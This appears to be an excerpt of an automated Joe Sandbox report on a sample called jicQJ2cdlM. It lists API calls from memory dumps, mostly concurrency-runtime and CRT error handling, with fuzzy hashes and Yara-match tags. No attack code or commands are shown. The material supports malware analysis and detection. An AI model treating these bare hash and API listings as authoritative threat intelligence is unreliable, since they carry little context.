                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                    • String ID:
                                                                                    • API String ID: 4284812201-0
                                                                                    • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                    • Instruction ID: 4388fe417676eb8c9382bbfe6cb189ad9b176a634ace2ab9c7b3428b3f765ee9
                                                                                    • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                    • Instruction Fuzzy Hash: A4F0BE3168470CA79F18BAA40852BBE269E5FD1320F48013AF712AB3C2CEB48E0593D5
                                                                                    APIs
                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 009F37AC
                                                                                      • Part of subcall function 009F2B36: ___crtGetTimeFormatEx.LIBCMT ref: 009F2B4C
                                                                                      • Part of subcall function 009F2B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009F2B6B
                                                                                    • GetLastError.KERNEL32 ref: 009F37C8
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F37DE
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F37EC
                                                                                      • Part of subcall function 009F290C: SetThreadPriority.KERNEL32(?,?), ref: 009F2918
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                    • String ID:
                                                                                    • API String ID: 1674182817-0
                                                                                    • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction ID: 125f10a46583aa5d637da35407b45095e79b75e1bff49ad5788751d90d2472dc
                                                                                    • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction Fuzzy Hash: 81F0A7B264031D3AE720B7755D07FBB369C9B41751F50481BBA45E70C2ED98D80487B8
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 009FD0A8
                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 009FD0CC
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FD0DF
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FD0ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID:
                                                                                    • API String ID: 3657713681-0
                                                                                    • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction ID: 020ed4b94e5a05bf297f1b7c93ee93d91d2a2a0ac28471a5996c791644c3f2f7
                                                                                    • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction Fuzzy Hash: C4F0593150120C63C724EB11D842DBDB37E8ED0B14728841AEB0653182DF35AE0AC355
                                                                                    APIs
                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 3803302727-0
                                                                                    • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                                                    • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                                                    APIs
                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 009F288F
                                                                                    • GetLastError.KERNEL32(?,?,?,?,009F8850,?,?,?,?,00000000,?,00000000), ref: 009F289E
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F28B4
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F28C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 3803302727-0
                                                                                    • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction ID: e1c4a9bf01560cd57d9cc1033206278cf35adea2a0cc3ac62686f59dabc5acf0
                                                                                    • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction Fuzzy Hash: B3F0303550020EBBDF10EFA4DD45FAF376C6B00B51F600655B615E60E1DA75DA0497A8
                                                                                    APIs
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009E5AA8
                                                                                    • __Cnd_signal.LIBCPMT ref: 009E5AB4
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009E5AC9
                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 009E5AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                    • String ID:
                                                                                    • API String ID: 2059591211-0
                                                                                    • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction ID: 85b0a7a6662fe738999840b5de9aa8de03c7957495624d3587c173bab47260b3
                                                                                    • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction Fuzzy Hash: A4F0A032000B81ABEB327B22C81776A73A4AFC0325F184529F196665A2CFBAAC449751
                                                                                    APIs
                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                    • String ID:
                                                                                    • API String ID: 200240550-0
                                                                                    APIs
                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 009F25B3
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,009F0DC0), ref: 009F25C1
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F25D7
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F25E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                    • String ID:
                                                                                    • API String ID: 200240550-0
                                                                                    APIs
                                                                                      • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                    • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                                                    • GetLastError.KERNEL32 ref: 004239B1
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3735082963-0
                                                                                    APIs
                                                                                      • Part of subcall function 009F2979: TlsAlloc.KERNEL32(?,009F0DC0), ref: 009F297F
                                                                                    • TlsAlloc.KERNEL32(?,009F0DC0), ref: 00A03C06
                                                                                    • GetLastError.KERNEL32 ref: 00A03C18
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A03C2E
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03C3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3735082963-0
                                                                                    APIs
                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3016159387-0
                                                                                    APIs
                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,009F0DC0,?,?,?,00000000), ref: 009F27BE
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 009F27CD
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F27E3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F27F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3016159387-0
                                                                                    APIs
                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                    • GetLastError.KERNEL32 ref: 004126BD
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                    • String ID:
                                                                                    • API String ID: 4286982218-0
                                                                                    APIs
                                                                                    • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                    • String ID:
                                                                                    • API String ID: 1964976909-0
                                                                                    APIs
                                                                                    • TlsSetValue.KERNEL32(?,00000000,009F7BF8,00000000,?,?,009F0DC0,?,?,?,00000000,?,00000000), ref: 009F29DE
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 009F29EA
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2A00
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2A0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                    • String ID:
                                                                                    • API String ID: 1964976909-0
                                                                                    APIs
                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 009F2918
                                                                                    • GetLastError.KERNEL32 ref: 009F2924
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F293A
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2948
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                    • String ID:
                                                                                    • API String ID: 4286982218-0
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                    • GetLastError.KERNEL32 ref: 00412725
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3103352999-0
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32(?,009F0DC0), ref: 009F297F
                                                                                    • GetLastError.KERNEL32 ref: 009F298C
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F29A2
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F29B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3103352999-0
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    APIs
                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 0-711371036
                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                                                    APIs
                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A1B34B,?,00000050,?,?,?,?,?), ref: 00A1B1CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 0-711371036
                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction ID: dbb3e87d6ada4d3e7e77450192123ce3ce23e49f73a6c8396692219387236e3c
                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction Fuzzy Hash: E221AF72A60104B6EB24CF658D25BD772AAEF94B60F578624E909D7200F732DEC0C3B0
                                                                                    APIs
                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodersGdipImage$Size
                                                                                    • String ID: image/png
                                                                                    • API String ID: 864223233-2966254431
                                                                                    • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                    • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                                                    • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                    • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000000D,?,009EE0CD,009EC8E5,?,?,00000000,?,009EC7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,009EC8E5), ref: 009EF236
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1452528299-1785270423
                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction ID: 8693fc83c02c618bc11637a78adec162a0a1b451d2a5c1dd1c40516ecf80483f
                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction Fuzzy Hash: 44118E3B20026AEFCF175F65DC6496ABB69FF09B16B10443AFA2596210CB719C109BA0
                                                                                    APIs
                                                                                      • Part of subcall function 009F0F85: RtlEnterCriticalSection.NTDLL ref: 009F0F86
                                                                                    • List.LIBCONCRT ref: 009FDBCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterListSection
                                                                                    • String ID: +$D$11@
                                                                                    • API String ID: 2909958271-3688954461
                                                                                    • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                    • Instruction ID: ac40e229390ae6e8bf42d908e71dbffbadfa0fa2926332678804521af35960df
                                                                                    • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                    • Instruction Fuzzy Hash: D2212C75A00219CFCF04EF68C585AADB7B5FF88310B154469E906AB352CB70EA45CF90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: SpinWait
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2810355486-1785270423
                                                                                    • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                                                    • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SpinWait
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2810355486-1785270423
                                                                                    • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction ID: 8d22df24f644f03797246040cfcdece639f1f4550e7188f392b1f8b66daa82e8
                                                                                    • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction Fuzzy Hash: 1101B531B1862ADFCB259F39D908776BBD4EB11721F14852DD35683664CA61DC40CBC0
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: 11@$LCMapStringEx
                                                                                    • API String ID: 2568140703-3516914342
                                                                                    • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                    • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                                                    • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                    • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                                                    APIs
                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_destroy
                                                                                    • String ID: f(@$ios_base::failbit set
                                                                                    • API String ID: 4194217158-3705395444
                                                                                    • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                    • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
